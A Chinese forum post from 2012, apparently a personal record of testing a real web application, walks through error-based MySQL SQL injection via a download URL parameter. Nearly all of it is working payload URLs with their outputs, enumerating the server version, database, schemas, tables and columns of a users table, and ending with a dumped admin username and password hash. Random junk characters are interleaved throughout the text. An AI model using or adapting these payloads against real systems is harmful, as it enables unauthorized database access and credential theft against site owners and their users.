http://www.wooyun.org/bugs/wooyun-2010-01666' H9 n$ E, B R9 }# v& P7 h
9 S' s, \7 G9 T之前想找个测试 没想到这有 可以测试下做个记录而已
% G9 E$ P: K' D% w; C0 [ ~1 K7 d j7 s+ n# {& K
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
* e- K+ u6 E9 E" \+ I* i
' }( o8 U5 [- i' K6 b) T4 g+ B* P/data0/htdocs/leqi_new/app/myapp.php" s$ [1 X9 T# A( A8 {6 M
1 C2 j. Q1 {$ x& M- M- x6 K0 j 或者" T+ _ _; h- r0 W$ I9 ~3 S F
9 s" \" h; e" z. s0 W" }# e/**********version()**********/ 5.1.49-log$ K- F, c8 |8 U' T( N/ @3 W
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 A& w; R1 k, _
! r1 }4 }: B4 r: n; Q/**********user()**********/
3 Q3 r. H* h' j8 r! D& k- Z- b2 shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 B- m/ c8 U/ z% \6 T0 V4 R8 c1 t& a8 t! k& ]4 i
/**********database()**********/ leqi6 ]& w# r% v( w' s/ p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: a: G( h' g7 I: v; t+ c
/ n& v: V( w- L( ^+ w3 b
/**********limit依次递归爆库**********// f$ q3 b! ]$ W5 u3 \$ i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' ^2 `$ m1 r, X/ k5 A0 G) r% jinformation_schema2 ^- o8 t' w Q1 R$ \' f6 N4 m
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 w6 e. v. f3 R( F; V
leqi
) r6 a ^- f0 k; q. U- b. ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. O4 M7 ^. e/ B7 L. Y7 stest
" o/ z3 m' J" e. |$ t- F* Y. \3 H1 w/ i7 d0 A+ @3 y
/**********limit依次递归爆表名**********/2 U- ^2 E! [4 H) c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 p8 B0 e' r) \# n7 S3 Busers1 j( U% B! v) ^
: r! v' g) ?( H; Z P
/**********limit依次递归爆字段名**********/' F0 d* E9 w5 c' {8 H- k* ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- ^0 c8 `% q0 P# uuser_id,username,nickname,passwd,group_id
3 ?* s" d/ l# r4 k2 ?/ Chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6 `" Z9 d% f# Z& w2 W) J6 n4 i/wapc/5000_0005_003
) k/ l; ^4 l r1 E# f u11 21
5 O$ {/ d& w+ E) l" ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%231 `% y% r( @% t0 b' M" {
/wapc/5000_0005_003
( X0 A1 p. y) j11 341 351 361
* e1 _: t& X7 Z8 m. n1 ^) ]4 D/**********爆数据**********/- y1 f5 ?$ r' i/ ^. i0 o. g- k* J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' m) a! F8 t U$ V# b4 {: Iadmin
7 q$ Z) J* l2 e- r: m6 H( jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
7 B6 T* \) x' U6a8b4574ca231eb8bd52764d4978ffcd
9 _9 F( o8 x: T* y8 ~' x1 J' Q% \$ z6 F( D7 a
+ ]1 Z# Y3 z; [4 x" z/ v; S) p/ Q
|
发表于 2012-9-13 17:52:09
收藏
支持
反对